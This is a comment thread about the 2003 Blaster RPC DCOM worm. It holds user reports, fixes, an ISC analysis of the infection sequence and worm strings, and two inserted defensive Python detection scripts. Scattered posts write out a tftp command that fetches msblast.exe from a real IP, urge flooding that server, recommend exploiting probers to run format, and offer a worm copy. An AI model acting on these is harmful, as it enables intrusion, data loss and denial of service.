RPC DCOM Worm On The Loose
GPez writes "The first of I'm sure many RPC DCOM worms affecting Windows is on its way, according to the Internet Storm Center. Patch those systems!" According to the site, "The worm uses the RPC DCOM vulnerability [affects Win2k through Server 2003] to propagate. Once it finds a vulnerable system, it will spawn a shell on port 4444 and use it to download the actual worm via tftp."
The security team at my office has been scrambling to secure all of our systems before such a worm was developed. I hope they are done!
Will blocking port 135 at the router stop this worm? Seems like a simple solution for the short term. I would like to see the source for the worm, does anybody have it?
It's been hitting efnet for the past week. I've seen plenty of people in lots of channels infected, and it's a pain helping people clean up their systems. This one is a big mess.
If you have Linux, then just ignore this article.
Is it opening a shell on port 4444 or a tftp server?
It's called a firewall. It's protected me from Nimda, Code Red, etc.
no need to reboot any time soon for that old windows 98 part since I'm a linux junkie by now hehehe
Developers developers developers..
...
erm...
security security security... erm
um...
somebody get me more cocaine!
the call centre here is off the scale with people ringing in with rpc problems...
all xp users though
At least Microsoft was nice enough to credit LSD in the tech note.
if you use this vulnerability against someone (usually people that hit your web server with /default.ida) you get access to a C:\ prompt. You can look around, run format, etc.
It's quick to crash the machine (apparently) as the remote becomes unusable (pingable though).
It's actually pretty nasty from what I have seen... I just wonder how effective the worm will be when the machine becomes unresponsive after a few commands?
Perhaps it won't spread as fast as others because of this problem? I suppose we can hope.
Developers: RPC DCOM Worm On The Loose
Shouldn't that be:
Developers, Developers, Developers, Developers, Developers, Developers, Developers, Developers, DEVELOPERS!, DEVELOPERS!, DEVELOPERS!, DEVELOPERS!, DEVELOPERS!: RPC DCOM Worm On The Loose
After watching all the message traffic on the full-disclosure list about this exploit I knew a worm would be forthcoming. This is a fairly easy to abuse exploit and with all the unpatched systems out there I can only imagine the possible growth this worm might experience.
I was *just* surfing D-Shield and was reading a notice about a captured worm. Sure enough, as soon as this article appeared.. the site is DOWN.. that really is something to see, even I get shocked every now and again.
I work at one of the nation's largest ISP tech support call centers. Our call volume is going through the roof today.
After reading the advisory, it looks like this one is going to be a bad one. I'm no expert, but I would guess that this thing is going to be around as long as code red was (and I'm still getting code red hits in my logs!)
And the government thinks Windows is more secure than SuSE Linux? Riiight.
This worm is bugged it seems. From XP systems I have seen it throws an error to the screen about RPC services and reboots the system. On Windows 2000 Pro it crashes the svchost and a lot of stuff stops working. Just an FYI for those trying to diagnose systems right this minute.
UNC-Chapel Hill South Campus [Medicine, Pharmacy, Nursing, etc] has been slammed by this thing.
The tragic part is that Microsoft posted the patch almost a month ago:
I was working on my parents' computer (Windows XP) remotely today when this started happening. I was installing some new software for them and I had also just disabled that stupid Messenger service so they would stop getting those pop-up spam messages.
:)
Anyhow, I had just finished that when XP said it was shutting down in 30 seconds. I was like, WTF!
Here I am thinking that I just screwed up their machine with the new apps somehow.
Thanks a bunch, Billy. Guess they'll be punting this one to Longhorn
Thinking that there has already for some time been a few "non-secret" exploits floating around in the wild for this it was just a matter of time.
;)
So I guess all windows security holes will lead to worms in the future? Maybe they should start calling heavy-load proof networks "worm-load proof" instead?
Incoming!!!! Oh, wait a second...
This thing runs using the DCOM-RPC protocol right? I got that port blocked at the firewall, any attempt to touch the port is just ignored.
Of course the patch will help if somehow it gets inside, but still...
I don't trust microsoft for my windows security when on the net... I trust linux.
I downloaded this patch for Windows 2000 then checked my local hotfix directory and found I had already applied this days ago.
/. article is about what is happening to those who haven't patched. Kinda like watching the poor sobs fight lions in the gladiatorial pits for education.
So I guess this
Hello everyone ..
... Seems a worm has been released. We have received a number of calls about people's systems shutting down with the following error: NT Authority System .. etc. etc.
:)
I work for a small ISP
And the computer restarts.. This happens about every 40-60 seconds making it "almost" impossible to patch the computer. Just a heads up for ANY IT guys out there
http://secur1ty.net/dcom.cgi
Check to see if you're vulnerable.
This is our number of dropped TCP 135 requests at our border since noon today, per 30 mins, seen on our 2 Class Bs:
57,003 1200 to 1230
75,317 1230
59,321 1300
52,642 1330
130,932 1400
202,996 1430
277,183 1500
247,682 1530
320,919 1600
361,504 1630 to 1700
Affected Software:
* Microsoft Windows NT(R) 4.0
* Microsoft Windows NT 4.0 Terminal Services Edition
* Microsoft Windows 2000
* Microsoft Windows XP
* Microsoft Windows Server(TM) 2003
Not Affected Software:
* Microsoft Windows Millennium Edition
finally! all these years of running Win ME have paid off! so long suckers!
OMG! It's not a worm, ITS SKYNET! It's taking over! Make your time, judgement day is nigh!
I've been digging around the web, and I can't seem to find out how to protect myself. I can't seem to find anything that prevents this virus from attacking my linux or as/400 servers. Help!
Got hit by this earlier today, I'm not normally a slouch with these things but this one really hit me hard, took me 4 restarts to find out what was going on. (As every time I connected to the net I was immediately given 60 seconds before another auto restart) I can see how non-techies are gonna be totally screwed by this.
:)
All I can say is change the properties of your RPC service repair functions. Start -> Administrative Tools -> Component Services -> Services (local). This will at least give you time to go online and download the MS patch, which we should have done weeks ago I know
I wonder if this is why most of Sweden's ADSL connections are down ATM :(
replace worm.exe with safe.exe or something. Maybe we can even put a linux installer on there and "convert" some to the safe computing world.
http://isc.sans.org/diary.html?date=2003-08-11
http://www.kb.cert.org/vuls/id/326746
win2k machines are still vulnerable to a dos; even patched.
Thanks microsoft...
I've heard rumours that China has plenty unpatched machines. Maybe they intend to use the firewall to block those Mongolian RPC invaders!
My JBoss server was listening on port 4444, so I got a call from the IS guys who thought my PC was compromised.
I work at a Microsoft call center :-(
Everybody keeps posting that they have this or that port blocked on their firewall, so they're safe. Not so. All it takes is one person inside your network to open the wrong file attachment, or one laptop that went outside the network and then came back in to infect your internal network.
I suggest the "Trustworthy Computer"
W32.Blaster.Worm http://www.symantec.com/avcenter/venc/data/w32.blaster.worm.html
Someone should change the worm to make it reboot the machine - that'll larn 'em :O)
You did say this was a RPG worm, right?
It looks like the worm affects svchost.exe (the Generic Host Process), and keeps restarting the computer. At first I thought that some of my hardware was failing, but after reading dozens of posts on Usenet about similar problems, I wasn't really sure. So I researched a bit on Google, and found the MS security bulletin. After patching my system, the problems seem to have gone. I guess I should have followed more closely Microsoft's security announcements.
So, if you have strange issues with the RPC, or are experiencing similar symptoms as I have, patch up now!
My computer started rebooting itself this afternoon stating .. "windows must now restart because the Remote Procedure Call (RPC) service terminated unexpectedly"
I figured it was a new worm!
Are there really that many win2k systems not even running SP3? That's not the only fix, but I have a box here that has had zero patches except SP3 and DCOM is disabled by default - which pretty much makes this "buffer overflow" a non issue. Doesn't XP also install (by default) DCOM disabled? So where is all this traffic coming from? People too nervous to install SP3? People too stubborn to stop using NT4?
Does anyone know if WINE supports this worm yet? I would like to test it out but I don't have Windows on my desktop.
Thanks.
A friend of mine called me about 3 hours ago saying that her brand new Windows XP notebook kept rebooting with some strange message about RPC. I had her download the free version of ZoneAlarm and that blocked the worm and let her stay online long enough to download the patch. If you know somebody that's getting hammered, have them give ZoneAlarm a shot.
On XP you are getting two error codes.
The first is a system shutdown window telling you that the RPC service must be restarted. This gives you 30 seconds before reboot. Initiated by NT Authority\system. This is a successful XP infection.
The other is Windows cannot open this file:
File: TFTp784
This appears to be an unsuccessful try.
For windows 2000 it crashes svchost trying to get in it appears. Just apply the patch to stop the crashes. It does not appear to get into the system in this case
Hope this helps everyone
I just noted something I liked from the article... Just to make things more fun they suspect that it also starts a synflood attack on windowsupdate.com, meaning it is a worm that tries to make it hard to get the patch to fix things... I find that funny, almost as good as the suggestion for a virus/worm to actually _do something_ damaging to a system to convince people this is not a joke.
Anyway
And our users are getting POUNDED by this.
"YOU BASTARDS KEEP DISCONNECTING ME!"
This is my first post - I'm just posting to say, that at about 1:00am today, I already found MSBlast.exe on my computer after a series of RPC errors. I patched using a file you can find in MS database: http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS03-026.asp
And after cleansing my computer (and loading up Tiny Firewall 5.0) the problem is fixed.
Also a helpful hint in case you need it:
If you receive an RPC error and a countdown is started to shut your computer down, then go to start>run and type "shutdown /a" and that will stop the countdown.
Hope this helps someone at least.
"trusted computing"
thank god i dont have a c: drive, i have everything set to d:/ :) hahaha!
First worm? Nope. Second? Not even. I work at a university and we have been running around for a week now patching systems and fixing worms that started last week. They have hit NT 4 and 2000 machines. We found them by chance, but they are installing all sorts of things. Trojan.stealther is the one that hit hardest, on all unpatched 2000 machines. So this is not the first worm at all. They have been out in the wild for at least a week now, and we are now patching and fixing all the many hacked or vulnerable systems.
Enable Internet Connection Firewall, apply patch, remove virus :-)
The first is necessary because it is the buffer overrun which reboots the computer.
My girlfriend called me not 20 minutes before this article went up asking what RPC was and why it was shutting her computer down whenever she got on the Internet. A quick glance at this article's headline followed by a thorough read of Symantec's removal instructions led to me calling her back and another day saved! Thanks, Slashdot! Thanks, Symantec Security Response Team!
I don't really look at Windows security updates, but why the HELL don't they put these patches on Windows Update? The reason that these worms spread is because NORMAL people (and idiot sysadmins) don't go and read these security updates.
I have WinXP SP1 installed, with all the updates and critical security fixes installed. I just go look here and I see that there are 21 extra updates I should install. All of them are remote exploits as well.
I will say that I am surprised, I thought I had been staying up-to-date. I don't do Windows server administration, so I didn't know about these. I use Windows for my desktop, naturally. But I really don't understand why they don't go ahead and put this crap on Windows Update? Are they afraid of the bad press? Everyone and their goldfish knows that MS is insecure anyway, they may as well put it there.
Bleh. Why didn't /. cover the other 20 of these things?
Another comment was right - poorly configured firewalls will result in a HUGE problem. Here's the fix:
Control-Alt-Delete to get to Task Manager. Look for a process msblast. Kill that process. Using Task Manager, start a new process called regedit. Using regedit, navigate to HKLM\Software\Microsoft\Windows\CurrentVersion\Run and take out msblast there. Then run the patch from this site:
http://download.microsoft.com/download/9/8/b/98bcfad8-afbc-458f-aaee-b7a52a983f01/WindowsXP-KB823980-x86-ENU.exe
Restart. That should do it.
I just checked, and it has been hit 63 times in the last four hours. I would not run XP without good ol' ZA...
Sure there's a bug now. But Microsoft picking DCE RPC for DCOM was a nice thing for the open source community since it's a documented protocol. There's a project supporting it on Linux: freedce. I have used freedce to communicate between Linux and Windows. It's nice.
have a look at : http://security.tombom.co.uk/shatter.html
it is worth reading.......
At first, I couldn't figure out why Task Manager suddenly stopped working. Launching TaskMan.exe resulted in an error message "Task Manager has been disabled by the Administrator".
Odd, I thought. I *am* the administrator.
I realized I had been hit by a virus or worm when I rebooted and the autoexec.bat file opened up during my login. Not good.
Norton didn't pick up on this one at all; furthermore, McAfee's online virus/worm searching tool found a related virus, but not the actual baddie.
The virus that McAfee located - which probably came in after the worm opened up all those ports in my firewall - were in \WINNT\msagent\intl. Basically, anything in that directory that *isn't* a .dll file, delete them.
The worm itself is in \WINNT\system32\, and is called 'msconfig[nn].exe', where [nn] is interchangeable with two numbers. Mine was 'msconfig35.exe', I've read reports on various forums of others w/ '32' and '33' after the 'msconfig'.
Be careful here, as this app will spawn identical, hidden copies of itself with random names (like 'dwigjenjig.exe' or 'zajdfanltef.exe'). The easiest way I found to discern between real MS files and the worm was by looking at the last modified date displayed by Explorer, vs the last modified date that pops up when you mouse over the file name. All of the worm files had discrepancies between the two.
Hope that helps someone out there!
Comcast's being hammered with calls to their tech support line. The entire network is bogged down nationwide, due to an issue "Affecting Windows XP, Windows 2000, and Windows NT systems".
Their technicians are working with Microsoft to resolve the issue.
Knowing Comcast, that means they'll be up and running at full speed again in, oh, January next year at the soonest.
Somebody must be taking all the calls, because I'm sitting here in our HP call center, and nobody's printer has been broken allllllllll day. I'm assuming they all have their hands full. =)
And Cal(Berkeley) is blocking their network from outside access starting today for four days. Makes me wonder how many other large networks have been compromised, but don't know it.
I'm glad I don't work at Stanford.....don't envy them having to wipe 2,400 machines and sort through files that need to be replaced.....trying to avoid trojans, etc
Saw this discussion on the NANOG list.
What happens to your computer if you get this worm? My friend's XP box just went flaky, when you boot it up it says it has some kind of RPC problem then shuts down after some 30 seconds.
I asked another friend of mine if you could just put the recovery cd in reinstall the OS, but he wasn't willing to take a chance hosing his data.
Anyway I'm headed up to his place later today with knoppix in hand to burn him some cd's of his data so he can do a reinstall. He is freaking out since all of his invoices are on that computer and supposed to go out tomorrow. Gotta love that knoppix!
~50 hits on my router in just the last half-hour or so, 90% of them from Rochester and NYC RoadRunner addresses.
I have a feeling this worm will hit especially hard on home broadband users that never touch Windows Update.
I suggest you use GRC.com's excellent port scan feature if you got a Windows machine. It's called 'Shield's UP!' and is available here (scroll down a bit), and will scan your system's first 1052 ports.
...then could you use it to disinfect the system? Or at least notify the owner of the box, by making a txt file at the desktop or something.
HAHAHA. That is so funny. Windows Sux
So I load up my /. as my homepage, take a look at the first headline, RP-What? Read up a bit, go: "Huh, that's interesting" and head off to my email site. Bam! I get pegged with this worm and my computer shuts down. For anyone else in the same boat as me, you can still download the patch using the infected computer by typing: services.msc. There will be two services listed that are directly linked to this worm under the Remote Procedure Call heading, just look through the list in the standard tab. You can bypass it by going into the properties and changing the crash executions to "Do nothing" instead of restarting your computer. I was able to download the patch via the website and am now looking for a way to rid myself of this worm. Firewalls eh? I've heard of them, but then what else am I going to do in my spare time?
Anybody know good Internet traffic type sites where you can watch this unfold? I found one showing that Asia seems to be experiencing some troubles, but I'm not sure how accurate or good the info is.
I've said it before, and I'll say it again.
While there is no excuse for not updating your systems, some people can't do so because of business policy reasons (non-tested patches against business critical systems).
EVERYONE with a server on the internet should also have Egress filtering in place. 486 machines are cheap. Unix/Linux firewalls are free. On the off chance you do get the M$ IS$ Worm of the week, at least your server can't initiate an outgoing connection to download more code and move on to the next system.
To keep this worm from coming to full fruition, you also have to edit your registry and delete the msblast.exe file from your system32 folder. I want to go back home to my linux box and just forget this day ever happened...
am I missing something? why is this +4, funny?
Just for everyone's amusement, a major life insurance company, in Milwaukee, closed its port 135 when the announcement came out several weeks ago. But some idiot went and ran an unknown attachment on an email and now 5000 field employee computers were crippled.
Its just too funny.
tftp -i 217.211.179.193 GET msblast.exe
... lets slashdot them :) -that would slow the growth...
(use any of the ips listed on http://isc.sans.org/diary.html?date=2003-08-11)
maybe it's too late.
if you wish to analyse it a little, you can simply upx -d msblast.exe to unpack it...
Just FYI, I've confirmed on my system that at least some of the parent's information is true. I got hit around 2pm Dallas time, and I've now got a file called msblast.exe in c:\winnt\system32 with a file length of 6176 bytes.
After the "to say LOVE YOU SAN!!" string, I find these words: bill gates you make hi possi. And before it, it looks like it says "I ju wan to say" (with control characters that may or may not be of interest).
Sure enough, Symantec has some info now, too (just sent by someone in my co.).
Timing sucks on this one -- I'm right in the middle of coding for 3rd quarter tax changes. Crap!
The latest Win2k service pack is SP4, you know...
(This was released about 2 months ago, IIRC.)
We need more jobs in order to keep the jobless programmers from getting bored out of their skulls and creating worms.
And, we need to start making homework more interesting. I mean, really interesting. Totally, undeniably fascinating at that.
Well, it's a start. Any ideas on the latter? Because I'm absolutely clueless.
If you look at the security bulletin, it was issued on 16 July. The fix has been out for a month, and my work machine (XP) was installed on the same date via Windows Update.
While I love to bash MS as much as the next guy on SlashDot, this isn't news.
let the "*nix is better" jokes begin.
Parent poster is obviously pretending to be MS employee....
Nice joke though....
Wow, slashdot (the editors) is putting way more emphasis on serious bugs in Windows than Linux, *bsd, or anything else.
:)
The reason being, of course, that the last worm to hit "Linux, *bsd or anything else" as hard as this RPC worm (or Nimda, etc.) hit Windows was the Morris worm.
They did this already last week on Stargate SG1 with that virus that spread from gate to gate and took down the whole network in 2+ hours. Can't these virus writers ever come up with something original?
Internet Storm Center is getting hammered, so I attach their analysis.
NOTE: the scanning is being done Code Red style, so it is concentrating on the class B pseudo-subnet, e.g. 123.123.x.x. If this gets inside your corporate firewall then you are screwed.
I count about 1 scan every 10 seconds at present.
--x8 Cut here ----
This RPC DCOM worm started spreading early afternoon EDT (evening UTC). At this point, it is spreading rapidly.
NOTE: PRELIMINARY. Do not base your incident response solely on this writeup.
Increase in port 135 activity: http://isc.sans.org/images/port135percent.png
The worm may launch a syn flood against windowsupdate.com on the 16th. It has the ability to infect Windows 2000 and XP.
The worm uses the RPC DCOM vulnerability to propagate. Once it finds a vulnerable system, it will spawn a shell on port 4444 and use it to download the actual worm via tftp. The exploit itself is very close to 'dcom.c' and so far appears to use the "universal Win2k" offset only.
Infection sequence:
1. SOURCE sends packets to port 135 tcp with variation of dcom.c exploit to TARGET
2. this causes a remote shell on port 4444 at the TARGET
3. the SOURCE now sends the tftp get command to the TARGET, using the shell on port 4444,
4. the target will now connect to the tftp server at the SOURCE.
The name of the binary is msblast.exe. It is packed with UPX and will self extract. The size of the binary is about 11kByte unpacked, and 6kBytes packed:
MD5sum packed: 5ae700c1dffb00cef492844a4db6cd69 (6176 Bytes)
So far we found the following properties:
- Scans sequentially for machines with open port 135, starting at a presumably random IP address
- uses multiple TFTP servers to pull the binary
- adds a registry key to start itself after reboot
Name of registry key: SOFTWARE\Microsoft\Windows\CurrentVersion\Run, name: 'windows auto update'
Strings of interest:
msblast.exe
I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? Stop making money and fix your software!!
windowsupdate.com
start %s
tftp -i %s GET %s
%d.%d.%d.%d
%i.%i.%i.%i
BILLY
windows auto update
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Existing RPC DCOM snort signatures will detect this worm. The worm is based on dcom.c
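The ISC writeup above describes the propagation pattern (a source walking addresses one by one on TCP/135, staying inside one class B), and an earlier post in this thread tallies border drops of TCP/135 per 30 minutes. The following is an added example, not code from ISC or from any poster, that implements both checks over firewall drop logs; the log line format is a constructed generic one, not any particular firewall's syntax.

```python
"""Detect Blaster-style TCP/135 scanning in firewall drop logs.

Added example for this thread, not part of the ISC writeup.  The log
format is constructed ("<ISO timestamp> DROP TCP <src>:<sport> -> <dst>:<dport>").
The heuristic follows the behaviour ISC describes: a source probing
destination addresses sequentially on port 135, concentrated in one /16.
"""
from collections import defaultdict
from datetime import datetime
import ipaddress
import re

LOG_RE = re.compile(
    r"^(?P<ts>\S+) DROP TCP (?P<src>[\d.]+):(?P<sport>\d+)"
    r" -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)

# Constructed sample: 10.20.5.7 sweeps 192.0.2.10-14 on 135 (Blaster-like),
# 10.9.8.2 probes scattered addresses, 10.1.1.1 sends a single probe later.
SAMPLE_LOG = """\
2003-08-11T14:02:01 DROP TCP 10.20.5.7:1034 -> 192.0.2.10:135
2003-08-11T14:02:02 DROP TCP 10.20.5.7:1035 -> 192.0.2.11:135
2003-08-11T14:02:03 DROP TCP 10.20.5.7:1036 -> 192.0.2.12:135
2003-08-11T14:02:04 DROP TCP 10.20.5.7:1037 -> 192.0.2.13:135
2003-08-11T14:02:05 DROP TCP 10.20.5.7:1038 -> 192.0.2.14:135
2003-08-11T14:02:10 DROP TCP 10.9.8.2:3201 -> 192.0.2.40:80
2003-08-11T14:02:11 DROP TCP 10.9.8.2:3202 -> 192.0.2.77:135
2003-08-11T14:02:12 DROP TCP 10.9.8.2:3203 -> 192.0.2.13:135
2003-08-11T14:02:13 DROP TCP 10.9.8.2:3204 -> 192.0.2.99:135
2003-08-11T14:02:14 DROP TCP 10.9.8.2:3205 -> 192.0.2.5:135
2003-08-11T14:35:09 DROP TCP 10.1.1.1:2000 -> 192.0.2.200:135
"""


def parse_line(line):
    """Return a dict for one drop line, or None if it is not in the format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return {"ts": m["ts"], "src": m["src"], "dst": m["dst"],
            "dport": int(m["dport"])}


def port135_targets(lines):
    """Map each source to its port-135 destinations, in log order, as ints."""
    targets = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["dport"] == 135:
            targets[rec["src"]].append(int(ipaddress.IPv4Address(rec["dst"])))
    return targets


def find_sequential_scanners(lines, min_targets=4):
    """Return {src: (first_dst, n_targets, within_one_slash16)} for sources
    whose successive port-135 destinations each equal the previous plus one."""
    hits = {}
    for src, dsts in port135_targets(lines).items():
        if len(dsts) < min_targets:
            continue
        if not all(b - a == 1 for a, b in zip(dsts, dsts[1:])):
            continue
        same16 = len({d >> 16 for d in dsts}) == 1
        hits[src] = (str(ipaddress.IPv4Address(dsts[0])), len(dsts), same16)
    return hits


def drops_per_window(lines, minutes=30):
    """Count port-135 drops per fixed window, keyed "HHMM" by window start,
    the same layout as the per-30-minute border counts posted in this thread."""
    counts = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["dport"] == 135:
            ts = datetime.fromisoformat(rec["ts"])
            start = ts.replace(minute=(ts.minute // minutes) * minutes, second=0)
            counts[start.strftime("%H%M")] += 1
    return dict(counts)


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print(find_sequential_scanners(lines))
    print(drops_per_window(lines))
```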
Step 1. Shut down PC
Step 2. Disconnect Network
Step 3. Start up PC
Step 4. Click Start -> Settings -> Control Panel
Step 5. Double Click Network Connections
Step 6. Right Click the Local Area Connection used to access Internet. Example: Local Area Connection 1
Step 7. Select Properties
Step 8. Click the Advanced Tab
Step 9. Enable the Windows XP Firewall
Step 10. Click OK, Close out of open windows.
Step 11. Plug in the network again.
Step 12. Ensure Connection is stable
Step 13. Open Internet Explorer
Step 14. Go to the following URL: http://www.microsoft.com/technet/default.asp
Step 15. Click the Link toward the middle of the page titled: Action: Read Security Bulletin MS03-026 and Install the Security Patch Immediately
Step 16. Scroll Down Page about half way to Patch Availability
Step 17. Click Windows XP 32 bit Edition
Step 18. Click Download in the upper right of the screen.
Step 19. Save the file to the desktop
Step 20. Run the downloaded file.
Step 21. The patch will install and prompt the customer to reboot.
Step 22. Once the patch is installed and the computer rebooted, the Windows XP firewall can be disabled and the customer can surf normally.
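The removal posts in this thread boil down to two checks: is msblast.exe on disk, and is the Run key still pointing at it. The following added example (not from Symantec, ISC or any poster) performs those checks against a constructed regedit export and constructed file bytes so it runs offline; the indicator values are the ones the ISC writeup in this thread quotes (file name, Run value name, 6176-byte packed size and its MD5).

```python
"""Host triage for the Blaster indicators quoted in this thread.

Added example, not from the thread, Symantec or ISC.  On a real host you
would feed run_values() the text of `reg export` for the Run key and
file_hits() the (name, bytes) of files found in system32.
"""
import hashlib
import re

# Indicator values as given in the ISC writeup posted in this thread.
RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
BAD_RUN_VALUE = "windows auto update"
BAD_FILE = "msblast.exe"
PACKED_SIZE = 6176
PACKED_MD5 = "5ae700c1dffb00cef492844a4db6cd69"

VALUE_RE = re.compile(r'^"(?P<name>[^"]*)"="(?P<data>.*)"$')

# Constructed regedit export: one benign autostart plus the Blaster entry.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Synchronization Manager"="mobsync.exe /logon"
"windows auto update"="msblast.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"""


def run_values(reg_text):
    """Parse the string values under the Run key of a .reg export."""
    values = {}
    in_run = False
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            # A bracketed line switches the current key; only Run is of interest.
            in_run = line[1:-1].lower() == RUN_KEY.lower()
            continue
        m = VALUE_RE.match(line)
        if in_run and m:
            values[m["name"]] = m["data"].replace('\\"', '"')
    return values


def registry_hits(reg_text):
    """Run values that carry the Blaster value name or launch its binary."""
    return {name: data for name, data in run_values(reg_text).items()
            if name.lower() == BAD_RUN_VALUE or BAD_FILE in data.lower()}


def file_hits(files):
    """files: iterable of (name, bytes).  A name match is a hit on its own;
    size_match and md5_match say whether it is the exact packed sample ISC hashed."""
    hits = []
    for name, data in files:
        if name.lower() != BAD_FILE:
            continue
        hits.append({
            "name": name,
            "size": len(data),
            "size_match": len(data) == PACKED_SIZE,
            "md5_match": hashlib.md5(data).hexdigest() == PACKED_MD5,
        })
    return hits


# Constructed stand-in bytes; not the worm, just something to hash.
SAMPLE_FILES = [
    ("svchost.exe", b"MZ placeholder, constructed"),
    ("msblast.exe", b"placeholder bytes, constructed for the example"),
]


if __name__ == "__main__":
    print(registry_hits(SAMPLE_REG))
    print(file_hits(SAMPLE_FILES))
```

A name hit with size_match and md5_match both false still means the box needs cleaning; it just is not byte-identical to the sample ISC measured.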
If you get the pop up giving you 60 seconds to shutdown and it's causing you hassle running the patch (ie, it happens every time you boot) then I hear you can stop the shutdown sequence by opening command prompt and typing 'shutdown -a'
Whether this works or not I don't know as I managed to patch mine. Hope this may be of some help.
I have a problem, a lot of my users work in remote offices which I can't touch. I don't trust all of them to apply patches on their own, I'm not quite sure what I'm gonna go about this. Hell, it's hard enough to have people actually read the e-mails we send out in the first place. Any suggestions?
Hate to say it, but the built in internet connection firewall in XP was dead handy - I couldn't stay online long enough to download the patch without being restarted, so i turned it on before connecting, and no problems since...
Darn, I really need to configure wingate properly, thought i had it tight...
I can't believe I went *3* reboots before turning off the error message - that's right! Then I read about this worm. Too much bf1942, not enough /. - the moral of the story.
Step 1. Shut down PC
Step 2. Unplug Cable Modem.
Step 3. Start up PC
Step 4. Click Start -> Settings -> Control Panel
Step 5. Double Click Network Connections
Step 6. Right Click the Local Area Connection used to access Internet. Example: Local Area Connection 1
Step 7. Select Properties
Step 8. Click the Advanced Tab
Step 9. Enable the Windows XP Firewall
Step 10. Click OK, Close out of open windows.
Step 11. Plug in the Cable Modem.
Step 12. Ensure Block Sync is established.
Step 13. Open Internet Explorer
Step 14. Go to the following URL: http://www.microsoft.com/technet/default.asp
Step 15. Click the Link toward the middle of the page titled: Action: Read Security Bulletin MS03-026 and Install the Security Patch Immediately
Step 16. Scroll Down Page about half way to Patch Availability
Step 17. Click Windows XP 32 bit Edition
Step 18. Click Download in the upper right of the screen.
Step 19. Save the file to the desktop
Step 20. Run the downloaded file.
Step 21. The patch will install and prompt the customer to reboot.
Step 22. Once the patch is installed and the computer rebooted, the Windows XP firewall can be disabled
Anyone find it ironic that the patch requires you to restart windows? Hehehe...
I work in tech for a local/regional ISP that has about 10k customers. Our phones are getting slammed pretty good with people saying "my computer is shutting down.. something to do with RPC blahblah" (our users aren't very smart, as if that's a revelation).
:(
This problem is real, and it seems pretty nasty so far. We're probably getting 40-50 calls an hour for the last 4-5 hours just on the RPC problem. That's a pretty good jump from maybe 10-15 calls an hour on average total.
I know I'm not having a good monday at work so far
I work at a pc support center and our phones went off the hook. Best bet was to either disable the RPC service, or enable the Win XP firewall and get the patch.
"Uh, WTF is SVCHOST.EXE, and why the fuck does it always bind itself to 445, and how can I make it stop doing that? I don't know what it's listening for, but I know that for what I'm using this box for, I don't need it, so why can't I disable the offending process?"
- Me, the first time I played with a W2K box.
"So SVCHOST does too much stuff to just kill it, but how can I at least stop it from binding to 445? I know I'm not doing anything on that port, and therefore don't want any process listening for data sent to it. Period."
- Me, after 5 minutes of trivial research.
"Crap, it looks like there's no way to stop SVCHOST from listening to 445. Guess I'd better install my favorite cheap-azz third-party software firewall and block it there. Once I've done so, I don't give a damn if SVCHOST still listens to 445, because unless there's a buffer 'sploit in the firewall software itself, SVCHOST won't get any of the traffic anyways."
- Me, after 5 more minutes.
"I knew this was gonna happen."
- Me, when I read about the DCOM hole last month.
Security is a process, not a product. The process is "Everything is forbidden except what is permitted. Run no services other than the bare minimum required to get the box to bring up a GUI. Run no services that listen to any network traffic unless explicitly started by the user."
Insecurity is a product, not a process. The product is "DCOM should be on by default because pointy-haired bosses won't be able to do $NEW_OFFICE_SUITE_FEATURE without it, nobody buys the OS for anything other than running Office and Outleak."
Repeat ad nauseam with IIS on/enabled by default (CodeRed), the ActiveX/scripting settings for MSIE (Drive-by downloads), the out-of-the-box UPnP vulnerability (port 1900), popup "spam" (port 135), etc.
Basically, every time M$ has the choice between security (Built shiny thing. Disable by default and have applications respond with an error message telling users how to turn shiny thing on if and only if the shiny thing is required by some user action), and stupidity (Oooooh, shiny thing! Enable by default and assume there are no bugs in the code anywhere!), Bill and friends have chosen stupidity.
According to this slashdot post it says Win2k - Win2k3 is affected. Microsoft's page says the exploit is available in NT4.
gives a rundown on how to remove it. http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html
-- troutsoup.com
here. Includes snort signature etc.
Didn't the RPC worm come out 2-3 weeks ago?
I went through the RPC worm shit 2 weeks ago. How is this news now? I've patched almost all of my boxes and am about finished with cleaning up the boxes that got missed and consequently hacked.
We've currently got 112 Windows XP lusers in our queue looking at a 2 hour wait time to talk to us virus removal techs. "Sorry, no removal instructions, call tomorrow." hehe
here is a copy of the worm client for those interested (17k rar).
be warned, this will mess up your system if you're not careful.
yes, i knowingly ran the worm, what can i say, i was bored/curious :)
this sig was brought to you by the letter
Is that the S word I see here?
http://www.microsoft.com/com/tech/DCOM.asp
A lot of people seem to think the executable is bugged, crashing the RPC service and causing Windows to shutdown. Seems like a good payload to me. In my example, my computer shut down within a few minutes. This makes it exceedingly hard for people to find information and download a patch to fix it, yet at the same time, the trojan is scanning and infecting others while you're trying to fix it. I was struggling to download the patch on modem, took about 5 shutdowns until I had it. Also, at this moment, the main cable provider in the UK seems swamped with this problem, and I don't think it'll go away fast.
I got a message from my friend on my ICQ that something was up. He gave me a link to http://microsoft.com/downloads/details.aspx?FamilyId=2354406C-C5B6-44AC-9532-3DE40F69C074&displaylang=en
But I couldn't access the site, like I couldn't access many other sites. So he sent me the update through ICQ and I patched my Windows XP and rebooted.
After the reboot I haven't been able to connect to ICQ or MSN Messenger and I can only access a couple of sites (like this one, luckily). I tried restoring the system like it was before the patch, but then there still was the same problem so I patched it again.
I've used the windows search to see if I have the MSblast.exe file and it didn't find it.
Am I infected, or is it just that every other damn server I am trying to connect to is?
Sorry for the long post.
